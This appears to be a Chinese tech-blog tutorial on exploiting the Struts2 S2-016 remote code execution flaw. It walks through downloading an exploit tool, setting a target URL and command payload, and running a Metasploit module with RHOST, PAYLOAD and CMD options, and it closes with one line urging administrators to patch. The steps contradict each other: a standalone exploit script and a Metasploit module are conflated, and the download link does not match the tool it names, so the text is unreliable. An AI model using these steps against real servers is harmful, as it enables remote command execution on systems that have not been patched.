欢迎访问宙启技术站
智能推送

Struts2 远程执行代码(S2-016) 利用工具

发布时间:2023-05-15 10:48:55

S2-016是Struts2的一个远程代码执行漏洞,攻击者通过该漏洞可以远程执行自己的恶意代码,从而危害服务器安全。本文将介绍S2-016利用工具的使用方法。

1.下载工具

S2-016的利用工具有很多,比如Metasploit和S2-016-Exploit 。这里我们以S2-016-Exploit为例进行介绍。可以在GitHub上进行下载:https://github.com/rapid7/metasploit-framework

2.安装工具

下载完成后,解压源代码,进入到解压后的文件夹,然后运行以下命令以安装依赖项:

bundle install

3.配置工具

打开exploits/S2-016目录下的s2-016.rb文件,将target_url和payload设置为目标服务器的URL和执行的payload,如下所示:

target_url = "http://example.com/struts2-showcase/index.action"

payload = "ping -c 3 127.0.0.1"

其中,target_url为目标服务器Struts2的漏洞URL地址,payload为将要执行的命令。

4.运行工具

运行以下命令以执行利用工具:

msfconsole

use exploit/multi/http/struts2_s016

set URIPATH struts2-showcase

set TARGETURI /struts2-showcase

set RHOST example.com

set RPORT 80

set PAYLOAD linux/x86/exec

set CMD "ping -c 3 127.0.0.1"

set VHOST example.com

run

其中,set URIPATH、set TARGETURI、set RHOST、set RPORT、set PAYLOAD、set CMD和set VHOST需要根据具体情况进行修改,最后运行run命令即可触发漏洞利用。

总结

S2-016是一个较为严重的漏洞,攻击者可以通过此漏洞远程执行恶意代码,危害服务器安全。因此,建议管理员及时升级修补,避免被攻击者利用漏洞对服务器进行攻击。